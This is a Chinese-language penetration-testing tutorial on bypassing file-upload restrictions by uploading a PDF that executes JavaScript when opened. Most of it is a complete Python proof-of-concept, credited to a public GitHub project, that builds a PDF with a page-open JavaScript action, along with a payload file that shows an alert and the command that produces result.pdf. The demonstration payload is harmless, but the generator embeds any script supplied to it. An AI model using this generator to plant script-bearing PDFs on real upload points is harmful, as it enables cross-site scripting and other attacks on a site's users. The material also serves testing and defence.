简介
在文件上传点，如果上传不了图片格式的文件，可以尝试上传 html 或 pdf 文件来达到 XSS 的效果。上传 html 就不多说了，下面说明如何让 PDF 弹窗。
操作步骤:
环境准备:python3
需要准备poc.py和poc.js
poc.py内容
# FROM https://github.com/osnr/horrifying-pdf-experiments
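import sys

from pdfrw import PdfWriter
from pdfrw.objects.pdfname import PdfName
from pdfrw.objects.pdfstring import PdfString
from pdfrw.objects.pdfdict import PdfDict
from pdfrw.objects.pdfarray import PdfArray


def make_js_action(js):
    """Return a PDF action dictionary of type ``/JavaScript`` carrying *js*.

    Args:
        js: script source as a string; stored verbatim in the ``/JS`` entry.

    Returns:
        A ``PdfDict`` with ``/S /JavaScript`` and ``/JS``. From a defender's
        side, this ``/S /JavaScript`` name is the marker an upload filter or
        PDF sanitizer would look for and strip or reject.
    """
    action = PdfDict()
    action.S = PdfName.JavaScript
    action.JS = js
    return action


def make_field(name, x, y, width, height, r, g, b, value=""):
    """Build a text-field widget annotation drawn as a solid colored box.

    Args:
        name: field name, stored in ``/T``.
        x, y, width, height: field rectangle in PDF user-space units.
        r, g, b: fill color components, passed straight to the ``rg``
            operator (presumably 0.0-1.0, as that operator expects).
        value: initial field value, stored in ``/V``.

    Returns:
        A ``PdfDict`` widget annotation. ``/Ff`` is set to 2 and ``/MaxLen``
        to 160; the appearance stream (``/AP /N``) and the ``/MK /BG``
        background both use the same color, see the comment below for why.
    """
    annot = PdfDict()
    annot.Type = PdfName.Annot
    annot.Subtype = PdfName.Widget
    annot.FT = PdfName.Tx
    annot.Ff = 2
    annot.Rect = PdfArray([x, y, x + width, y + height])
    annot.MaxLen = 160
    annot.T = PdfString.encode(name)
    annot.V = PdfString.encode(value)

    # Default appearance stream: can be arbitrary PDF XObject or
    # something. Very general.
    annot.AP = PdfDict()
    ap = annot.AP.N = PdfDict()
    ap.Type = PdfName.XObject
    ap.Subtype = PdfName.Form
    ap.FormType = 1
    ap.BBox = PdfArray([0, 0, width, height])
    ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
    ap.stream = """
%f %f %f rg
0.0 0.0 %f %f re f
""" % (r, g, b, width, height)

    # It took me a while to figure this out. See PDF spec:
    # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
    # Basically, the appearance stream we just specified doesn't
    # follow the field rect if it gets changed in JS (at least not in
    # Chrome).
    # But this simple MK field here, with border/color
    # characteristics, _does_ follow those movements and resizes, so
    # we can get moving colored rectangles this way.
    annot.MK = PdfDict()
    annot.MK.BG = PdfArray([r, g, b])

    return annot


def make_page(fields, script):
    """Build one 612x792 pt page whose page-open action runs *script*.

    Args:
        fields: list of widget annotations (see ``make_field``) placed in
            the page's ``/Annots`` array.
        script: JavaScript source; it is wrapped in a try/catch and attached
            as the page's ``/AA`` ``/O`` (open) action.

    Returns:
        A ``PdfDict`` page with a single Helvetica font resource ``/F1``.
        The content stream only selects that font and draws no text; the
        visible behavior comes entirely from the open action, so a viewer
        that does not execute PDF JavaScript shows a blank page.
    """
    page = PdfDict()
    page.Type = PdfName.Page
    page.Resources = PdfDict()
    page.Resources.Font = PdfDict()
    page.Resources.Font.F1 = PdfDict()
    page.Resources.Font.F1.Type = PdfName.Font
    page.Resources.Font.F1.Subtype = PdfName.Type1
    page.Resources.Font.F1.BaseFont = PdfName.Helvetica
    page.MediaBox = PdfArray([0, 0, 612, 792])
    page.Contents = PdfDict()
    page.Contents.stream = """
BT
/F1 24 Tf
ET"""
    annots = fields
    page.AA = PdfDict()
    # You probably should just wrap each JS action with a try/catch,
    # because Chrome does no error reporting or even logging otherwise;
    # you just get a silent failure.
    page.AA.O = make_js_action("""
try {
%s
} catch (e) {
app.alert(e.message);
}""" % (script))
    page.Annots = PdfArray(annots)
    return page


def _read_fields(js_file):
    """Parse the leading ``/// name x y w h r g b`` lines of *js_file*.

    Reads until the first line that does not start with ``/// `` and returns
    one ``make_field`` widget per parsed line. The caller is expected to
    ``seek(0)`` afterwards, because the whole file (field lines included)
    is used as the script.
    """
    fields = []
    for line in js_file:
        if not line.startswith('/// '):
            break
        pieces = line.split()
        # First token after '///' is the field name; the rest are numbers.
        params = [pieces[1]] + [float(token) for token in pieces[2:]]
        fields.append(make_field(*params))
    return fields


if len(sys.argv) > 1:
    # Module-level script behavior kept as in the original: argv[1] is the
    # JS file, output is always result.pdf in the current directory.
    # The file is closed by the with-block (the original leaked the handle).
    with open(sys.argv[1], 'r') as js_file:
        fields = _read_fields(js_file)
        js_file.seek(0)
        script = js_file.read()
    out = PdfWriter()
    out.addpage(make_page(fields, script))
    out.write('result.pdf')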
poc.js内容
app.alert("test")
执行命令 `python3 poc.py poc.js`，会在当前路径生成一个 result.pdf 文件，直接打开这个 PDF 文件就能弹窗。
直接打开